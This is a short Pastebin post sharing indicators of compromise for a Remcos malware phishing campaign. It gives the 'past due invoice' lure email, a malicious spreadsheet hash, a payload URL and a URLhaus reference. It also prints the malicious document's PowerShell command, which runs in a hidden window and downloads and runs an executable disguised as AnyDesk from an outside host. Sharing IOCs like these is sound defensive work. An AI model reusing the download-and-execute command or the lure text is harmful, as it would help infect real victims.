pandazheng

Remcos IOCs

Oct 11th, 2021
270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. Remcos IOCs
  2. https://github.com/executemalware/Malware-IOCs/blob/main/2021-10-11%20Remcos%20IOCs
  3.  
  4. THREAT IDENTIFICATION: REMCOS
  5.  
  6. SUBJECTS OBSERVED
  7. PAST DUE INVOICE
  8.  
  9. SENDERS OBSERVED
  10.  
  11. EMAIL BODY
  12. Good afternoon,
  13.  
  14. I need to confirm the following
  15.  
  16. Attached find past due invoice details for your records,
  17.  
  18. Kind regards,
  19.  
  20. MALDOC FILE HASHES
  21. PAST DUE INVOICE.xls
  22. 092fd1fae341ede766b93f694c4ea0bf
  23.  
  24. POWERSHELL FROM MALDOC
  25. C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Sou
  26. rce htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Pu
  27. blic\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
  28.  
  29. PAYLOAD URL
  30. http://thepunchlineexpose.com/Manager/AnyDesk.exe
  31.  
  32. REMCOS C2
  33. No C2 traffic observed - the payload url was 404
  34.  
  35. SUPPORTING EVIDENCE
  36. https://urlhaus.abuse.ch/browse.php?search=thepunchlineexpose.com
Advertisement
Add Comment
Please, Sign In to add comment